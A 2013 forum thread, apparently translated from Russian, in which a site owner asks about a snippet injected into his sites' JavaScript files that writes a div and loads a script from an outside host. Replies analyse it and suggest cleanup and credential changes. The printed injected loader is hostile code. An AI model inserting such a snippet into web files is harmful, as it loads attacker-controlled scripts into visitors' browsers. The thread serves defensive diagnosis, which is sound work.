Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
M
M
monoteos2013-08-06 17:11:29
Information Security
monoteos, 2013-08-06 17:11:29

Introduced a strange piece of code

Here is a piece of code that was implemented a couple of days ago in my two sites, mainly in js files, of

/*b44d55*/ function srcc() { var ff = document.createElement('script'); ff.src = 'http://mail.ru'; if (!document.getElementById('ff')) { document.write('<div id=\'ff\'></div>'); document.getElementById('ff').appendChild(ff); } } srcc(); /*/b44d55*/

course, I changed the passwords to ftp and mysql, maybe someone came across?
For the first time I see such that pieces of alien code appear in the code on the site

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

5 answer(s)
Report
N
Nikolai Vasilchuk, 2013-08-06
@Anonym

What the code does:

  1. A script is created with src=http://mail.ru
    var ff = document.createElement('script'); ff.src = 'http://mail.ru';

  2. div is added
    document.write('<div id=\'ff\'></div>');

  3. Script added to div
    document.getElementById('ff').appendChild(ff);


Since there is no point in adding a script from mail.ru, I assume that you also added left addresses to hosts so that mail.ru gives the desired script.

Report
O
Oleg, 2013-08-06
@eleventyseven

A year ago, I worked in a website development company, also engaged in hosting. One morning they discovered that about 100 sites were infected. Exactly this damn thing. Check all js, php, html files. Login via ftp

Report
L
lubezniy, 2013-08-07
@lubezniy

I think one of the novice hackers tested it, and then forgot to change the url corny.
And in the very fact of introducing code into files, alas, there is nothing surprising. Keep an eye on content and scripts all the time.

Report
R
rakot, 2013-08-06
@rakot

Yeah, you wind up counters for them, and they sign the mailvari certificate for you.

Report
T
termin, 2013-08-13
@termin

Came across something like this the other day. Moreover, having cleaned all the pieces that were changed on the site, on the OpenCart engine, the situation repeated itself, and now the site is no longer displayed at all. Interestingly, the hosts file changed almost at the same time as I came to work, and today I'm a little late. There is nothing interesting there, but the time of changing files on the site was also recorded after turning on the computer. While I'm looking towards FileZilla, because. FTP accounts were suspiciously known and Kaspersky Anti-Virus indicated the vulnerability www.securelist.com/ru/advisories/54415/?function=advisories&VN=54415 .

Similar questions
I
Ivan Koreshkov2016-10-19 05:59:47
How to secure a web server on a corporate network? 3Reply
M
Mnemonic02019-03-22 15:35:52
Which mail gateway should I choose? 5Reply
E
Euee2016-10-24 14:44:27
How to "softly" block the user's work on a domain computer? 2Reply
S
Sergey Gulin2016-10-28 17:09:41
How to ensure uninterrupted monitoring of the operation of sites / servers, and their security? 4Reply
R
rattle172020-12-13 01:52:14
A friend was hacked. How to understand anything? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question